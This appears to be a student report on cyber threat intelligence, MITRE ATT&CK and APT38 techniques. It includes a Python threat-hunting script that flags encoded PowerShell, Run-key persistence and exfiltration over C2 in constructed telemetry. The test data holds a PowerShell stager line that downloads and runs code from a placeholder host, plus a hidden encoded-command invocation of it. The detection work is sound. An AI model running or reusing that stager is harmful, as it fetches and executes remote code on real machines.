Threat Hunting Assignment Formatted

The document provides an overview of Cyber Threat Intelligence (CTI), emphasizing its importance in modern cybersecurity for proactive threat detection and incident response. It outlines various types of CTI, sources of intelligence, and introduces the MITRE ATT&CK framework, which helps map adversary behaviors for effective threat hunting. The report also discusses the techniques used by the APT38 group, highlighting the significance of CTI in enhancing organizational defenses against cyber threats.

Uploaded by thundernk1
Threat Hunting – Assignment 2

Nitesh Kumar B S

22BTCS134

B.Tech – Cyber Security

Garden City University


Cyber Threat Intelligence and Threat Hunting Report

Part 1: Understanding Cyber Threat Intelligence (CTI)

Definition of Cyber Threat Intelligence


Cyber Threat Intelligence (CTI) is the collection, evaluation, and analysis of information
about potential or current threats targeting an organization’s digital infrastructure. CTI
transforms raw data into actionable insights to support decision-making in cybersecurity
operations and defenses.

Importance of CTI in Modern Cybersecurity


In today’s complex digital environment, threats evolve rapidly. CTI plays a crucial role by:
- Enhancing proactive threat detection
- Guiding incident response and mitigation
- Informing security strategies and investments
- Improving the effectiveness of security tools like SIEM and IDS
- Helping anticipate attacker behavior based on prior patterns

Types of Threat Intelligence


Strategic
  Description: High-level, long-term analysis focused on trends and risk to inform executive decisions.
  Real-world example: A 2022 WEF report showed increased cyber risk in healthcare. A German hospital chain used this to increase cybersecurity budgets.

Tactical
  Description: Focuses on the tactics, techniques, and procedures (TTPs) used by attackers.
  Real-world example: The U.S. Energy Department detected spear-phishing using APT29 tactics during election season.

Operational
  Description: Near-real-time intelligence about ongoing attacks and threat actor infrastructure.
  Real-world example: FireEye observed and shared indicators during the SolarWinds breach.

Technical
  Description: Low-level data such as IPs, file hashes, and domains.
  Real-world example: A bank detected Emotet malware using shared IOCs from VirusTotal and ThreatConnect.

Part 2: CTI Sources

Here are five primary sources of Cyber Threat Intelligence along with their reliability and
challenges:

OSINT
  Explanation: Publicly available data from blogs, GitHub, forums, etc.
  Reliability: Varies
  Challenges: Risk of false or outdated data

SIGINT
  Explanation: Interception of signals and communication data; in practice available only to government agencies and the partners they share with.
  Reliability: High
  Challenges: Legal and ethical issues

Dark Web Monitoring
  Explanation: Threat intelligence from hacker forums and marketplaces.
  Reliability: Medium–High
  Challenges: Difficult to access and verify

Internal Logs
  Explanation: Includes firewall, DNS, and system logs.
  Reliability: High
  Challenges: Volume and complexity of data

Vendor Threat Feeds
  Explanation: From platforms like IBM X-Force or FireEye.
  Reliability: High
  Challenges: Subscription cost; may miss niche threats
Part 3: MITRE ATT&CK Framework

Introduction to MITRE ATT&CK


MITRE ATT&CK is a globally accessible knowledge base of adversary behavior based on
real-world observations. It helps defenders map TTPs and respond effectively to cyber
threats.

Purpose in Threat Hunting and Incident Response


- Mapping known behaviors to detection tools (SIEM, EDR)
- Prioritizing threats based on attacker techniques
- Enhancing blue team operations
- Supporting hypothesis-driven threat hunts

Chosen APT Group: APT38 (Lazarus Subset)


APT38 is a financially motivated North Korean group, known for bank heists that abuse the
banks' SWIFT messaging systems. Their TTPs include:

- Spear-phishing for initial access
- Use of custom RATs for execution
- Credential dumping
- Data exfiltration via C2 channels

Mapped Techniques from MITRE ATT&CK


Execution
  Technique: T1059 – Command and Scripting Interpreter (named "Command-Line Interface" before ATT&CK v7; PowerShell is sub-technique T1059.001 and the Windows command shell T1059.003)
  Description: APT38 uses PowerShell and CMD scripts for remote command execution.

Persistence
  Technique: T1547.001 – Registry Run Keys / Startup Folder
  Description: Malware is registered under a Run or RunOnce registry key so that it is launched again at each logon.

Exfiltration
  Technique: T1041 – Exfiltration Over C2 Channel
  Description: Stolen data is sent back over the existing, typically encrypted, C2 connection rather than over a separate channel.
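
A hypothesis-driven hunt for the three techniques in this table, written in Python as an added example; it is neither the report's own work nor MITRE content. The telemetry is constructed in a Sysmon-like shape (process creation, registry value set, network connection), the `bytes_out` field is assumed to be joined in from proxy or flow records, and the host names, paths, addresses and the 10 MB threshold are placeholders. The rules are hunt heuristics, not vendor detections: encoded or Office-spawned PowerShell and cmd.exe (T1059.001 / T1059.003), Run-key values pointing into user-writable directories (T1547.001), and a large outbound transfer by the binary the Run key launches (T1041). Each finding carries the technique ID so the results can be summarized per host in the form an ATT&CK Navigator layer uses.

```python
"""Hypothesis-driven hunt: tagging host telemetry with ATT&CK technique IDs.

Added example; not the report's own work and not MITRE content. Events are
constructed in a Sysmon-like shape; bytes_out is assumed to be joined in from
proxy or flow records. Hosts, paths, addresses and the 10 MB threshold are
placeholders. The rules are hunt heuristics, not vendor detection content.
"""
import base64
import re
from dataclasses import dataclass

# A stager a phishing document might launch, encoded the way PowerShell's
# -EncodedCommand expects (base64 over UTF-16LE). Address is an RFC 5737 placeholder.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/a')"
ENCODED_BLOB = base64.b64encode(STAGER.encode("utf-16le")).decode("ascii")

EVENTS = [  # constructed telemetry
    {"host": "WS-0512", "kind": "ProcessCreate",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + ENCODED_BLOB},
    {"host": "WS-0512", "kind": "RegistryValueSet",
     "target": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\a\AppData\Roaming\svchost.exe"},
    {"host": "WS-0512", "kind": "NetworkConnect",
     "image": r"C:\Users\a\AppData\Roaming\svchost.exe",
     "dst": "203.0.113.45", "dport": 443, "bytes_out": 48_000_000},
    {"host": "WS-0519", "kind": "ProcessCreate",
     "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe /c dir"},
    {"host": "WS-0519", "kind": "NetworkConnect",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst": "203.0.113.9", "dport": 443, "bytes_out": 12_000_000},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ENCODED_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Downloads|Public)\\", re.IGNORECASE)
EXFIL_BYTES = 10_000_000  # assumed threshold for one process in one session


@dataclass(frozen=True)
class Finding:
    host: str
    tactic: str
    technique: str
    evidence: str


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt_execution(e):
    """T1059.001 / T1059.003: encoded PowerShell, or an interpreter spawned by Office."""
    image, parent = basename(e["image"]), basename(e["parent"])
    if image == "powershell.exe":
        m = ENCODED_ARG.search(e["cmdline"])
        if m:
            try:  # -EncodedCommand carries base64 of UTF-16LE text, not UTF-8
                decoded = base64.b64decode(m.group(1)).decode("utf-16le")
            except ValueError:
                decoded = "<undecodable>"
            return Finding(e["host"], "Execution", "T1059.001",
                           f"encoded PowerShell under {parent}: {decoded}")
        if parent in OFFICE_PARENTS:
            return Finding(e["host"], "Execution", "T1059.001", f"PowerShell spawned by {parent}")
    if image == "cmd.exe" and parent in OFFICE_PARENTS:
        return Finding(e["host"], "Execution", "T1059.003", f"cmd.exe spawned by {parent}")
    return None


def hunt_persistence(e):
    """T1547.001: Run/RunOnce value pointing into a user-writable directory.
    Installers also write Run keys, so the path check cuts the benign volume."""
    if RUN_KEY.search(e["target"]) and USER_WRITABLE.search(e["details"]):
        return Finding(e["host"], "Persistence", "T1547.001", f"{e['target']} -> {e['details']}")
    return None


def hunt_exfil(e, implant_paths):
    """T1041: a large outbound transfer by a binary a Run key launches, i.e. over the
    channel the implant already holds. Volume alone would also flag browsers."""
    if e["image"].lower() in implant_paths and e["bytes_out"] >= EXFIL_BYTES:
        return Finding(e["host"], "Exfiltration", "T1041",
                       f"{basename(e['image'])} sent {e['bytes_out']} bytes to {e['dst']}:{e['dport']}")
    return None


def run_hunt(events):
    findings, implant_paths = [], set()
    for e in events:  # first pass: execution and persistence, collecting implant paths
        f = None
        if e["kind"] == "ProcessCreate":
            f = hunt_execution(e)
        elif e["kind"] == "RegistryValueSet":
            f = hunt_persistence(e)
            if f:
                implant_paths.add(e["details"].lower())
        if f:
            findings.append(f)
    for e in events:  # second pass: network events judged with persistence context known
        if e["kind"] == "NetworkConnect":
            f = hunt_exfil(e, implant_paths)
            if f:
                findings.append(f)
    return findings


def coverage(findings):
    """Technique IDs observed per host, the data an ATT&CK Navigator layer is built from."""
    out = {}
    for f in findings:
        out.setdefault(f.host, set()).add(f.technique)
    return out


if __name__ == "__main__":
    for f in run_hunt(EVENTS):
        print(f"{f.host} {f.tactic:<12} {f.technique:<10} {f.evidence}")
    print(coverage(run_hunt(EVENTS)))
```

The order of the passes matters: the exfiltration rule is deliberately weak on its own (a browser moving 12 MB is normal), and only becomes a finding once the persistence rule has identified which binary the attacker planted. That chaining of technique-level hypotheses, rather than matching single indicators, is what the ATT&CK mapping in the table buys the hunter.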

Conclusion
Cyber Threat Intelligence is critical for modern cybersecurity. When combined with
frameworks like MITRE ATT&CK, CTI enables organizations to proactively defend and
respond to threats. Real-world applications show how threat hunting evolves with
adversarial tactics.